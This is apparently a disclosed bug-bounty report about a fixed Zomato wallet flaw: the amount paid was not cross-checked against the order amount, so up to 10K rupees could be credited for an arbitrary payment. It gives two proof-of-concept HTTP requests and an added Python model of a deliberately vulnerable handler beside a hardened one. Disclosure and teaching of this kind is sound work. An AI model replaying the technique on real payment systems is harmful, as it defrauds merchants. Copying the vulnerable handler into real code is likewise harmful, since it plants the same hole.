
Add up to 10K rupees to a wallet by paying an arbitrary amount

High
Zomato

Team Summary

Official summary from Zomato

| TimeStamp | Action |
|----------|:-------------:|
| Wed, 24 Nov 2021, 11:24 IST | Received the report |
| Wed, 24 Nov 2021, 11:25 IST | Validation and analysis of issue initiated |
| Wed, 24 Nov 2021, 11:28 IST | Vulnerability reported to the respective Internal Team |
| Wed, 24 Nov 2021, 11:36 IST | The authenticity of the issue is verified by the Security Team |
| Wed, 24 Nov 2021, 11:41 IST | Report Triaged |
| Wed, 24 Nov 2021, 14:47 IST | Fix Deployed on Production |
| Wed, 24 Nov 2021, 14:48 IST | Severity adjusted to High (7.5 CVSS) by Security Team |
| Wed, 24 Nov 2021, 15:47 IST | Fix verified by the Security Team |
| Wed, 24 Nov 2021, 16:00 IST | Fix acknowledged by the respective Internal Team |
| Wed, 24 Nov 2021, 16:09 IST | Minimum Bounty awarded to the researcher |
| Wed, 24 Nov 2021, 16:28 IST | The researcher confirmed the fix |
| Wed, 24 Nov 2021, 23:15 IST | Full bounty + bonus awarded to the researcher |

## Summary:

Thanks to @ashoka_rao for reporting the issue. The researcher demonstrated a way to add any amount (up to 10K) to the Zomato wallet without paying the amount in full, by paying an arbitrary amount. Other payment methods and consumers, including online ordering, were not vulnerable to this.

## POC:

The addition to the Zomato wallet happens in a two-step process.

1. Generate the order request for the addition:

```http
POST /gw/payments/zomato_money/order

{"country_id":"1","service_type":"ZM_RECHARGE","cart":"null","amount":"1000.0"}
```

Response:

```json
{"order_id": "XXXX"}
```

2. Complete the payment against the order request:

```http
POST /v2/sdk/make_payment

amount=XX&order_id=XXX&order_type=ZM_RECHARGE
```

The amount requested to generate the `order_id` `XXXX` was `1000`, but while paying one could pass an arbitrary amount instead of `1000` against that `order_id`; the two values were not cross-checked.

So one could generate an order for the amount of `1000`, pay an arbitrary amount against the order, and still get the entire amount defined in the order added to the wallet (limited to 10K INR).

Reported by ashoka_rao
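
The two-step flow above, modelled as an added example (this is not Zomato's code, and the page does not show their server side). The in-memory order store, the wallet ledger, `to_paise`, `create_order`, `make_payment_vulnerable`, `make_payment_fixed` and `run_scenario` are all assumptions made to show the one missing check the report describes: step 2 charges whatever `amount` the client sends, while the wallet is credited with the amount stored on the order from step 1. The hardened handler treats the stored order as the only source of truth, rejects a mismatched amount, and also refuses replays of an already-paid order and orders that belong to another user or carry a different `order_type`.

```python
"""Model of the two-step Zomato Money top-up described in the report.

Added illustration, not Zomato's code: the in-memory order store, the
wallet ledger and every function name here are assumptions made to show
the missing cross-check between the order amount and the amount paid.
Amounts are held as integer paise so comparisons are exact.
"""
import secrets
from decimal import Decimal, InvalidOperation

WALLET_CAP_PAISE = 10_000 * 100   # the 10K INR limit mentioned in the report

orders = {}    # order_id -> {"user", "amount_paise", "type", "paid"}
wallets = {}   # user_id  -> balance in paise


def to_paise(amount: str) -> int:
    """Parse a rupee string such as "1000.0" into integer paise."""
    try:
        amt = Decimal(amount)
    except InvalidOperation:
        raise ValueError("amount is not a number")
    if not amt.is_finite() or amt <= 0:
        raise ValueError("amount must be a positive number")
    paise = amt * 100
    if paise != paise.to_integral_value():
        raise ValueError("amount has sub-paise precision")
    return int(paise)


def create_order(user_id: str, amount: str, service_type: str = "ZM_RECHARGE") -> str:
    """Step 1 (POST /gw/payments/zomato_money/order): record the requested
    top-up server-side and hand back an opaque order_id."""
    amount_paise = to_paise(amount)
    if amount_paise > WALLET_CAP_PAISE:
        raise ValueError("amount exceeds wallet cap")
    order_id = secrets.token_hex(8)
    orders[order_id] = {"user": user_id, "amount_paise": amount_paise,
                        "type": service_type, "paid": False}
    return order_id


def make_payment_vulnerable(user_id: str, order_id: str, amount: str, order_type: str) -> int:
    """Step 2 (POST /v2/sdk/make_payment) as the report describes it: the
    gateway charges the client-supplied `amount`, but the wallet is credited
    with the amount stored on the order. Nothing ties the two together."""
    order = orders[order_id]
    charged = to_paise(amount)                                   # e.g. 100 paise (1 rupee)
    wallets[order["user"]] = wallets.get(order["user"], 0) + order["amount_paise"]  # credits the full order
    order["paid"] = True
    return charged


def make_payment_fixed(user_id: str, order_id: str, amount: str, order_type: str) -> int:
    """Hardened step 2: the stored order is the source of truth. The client
    amount is accepted only if it equals the order amount, and the order must
    belong to the caller, match order_type, and not have been paid already."""
    order = orders.get(order_id)
    if order is None or order["user"] != user_id:
        raise ValueError("unknown order")            # same error either way: no existence oracle
    if order["type"] != order_type:
        raise ValueError("order_type mismatch")
    if order["paid"]:
        raise ValueError("order already paid")       # blocks replaying a paid order
    if to_paise(amount) != order["amount_paise"]:
        raise ValueError("paid amount does not match order amount")
    charged = order["amount_paise"]                  # charge what the order says, not the request
    wallets[user_id] = wallets.get(user_id, 0) + charged
    order["paid"] = True
    return charged


def run_scenario(pay, paid_amount: str = "1.0", attempts: int = 1) -> dict:
    """Create a 1000-rupee order for a fresh user, then pay `paid_amount`
    against it `attempts` times through `pay`; report charged vs credited."""
    user = "user-" + secrets.token_hex(4)
    wallets[user] = 0
    order_id = create_order(user, "1000.0")
    outcomes, charged = [], 0
    for _ in range(attempts):
        try:
            charged += pay(user, order_id, paid_amount, "ZM_RECHARGE")
            outcomes.append("accepted")
        except ValueError as exc:
            outcomes.append(f"rejected: {exc}")
    return {"outcomes": outcomes, "charged_paise": charged, "credited_paise": wallets[user]}


if __name__ == "__main__":
    print("vulnerable, pay 1 rupee      :", run_scenario(make_payment_vulnerable))
    print("fixed, pay 1 rupee           :", run_scenario(make_payment_fixed))
    print("fixed, pay 1000 rupees twice :", run_scenario(make_payment_fixed, "1000.0", attempts=2))
```

The point of the fixed handler is that the amount handed to the payment gateway comes from the order record, never from the `make_payment` request; the client-supplied value is only compared against it so that a tampered request fails closed. Working in integer paise rather than floats avoids a second class of bugs where `999.999` and `1000` compare equal after rounding.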

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$2000.00

Weakness

Business Logic Errors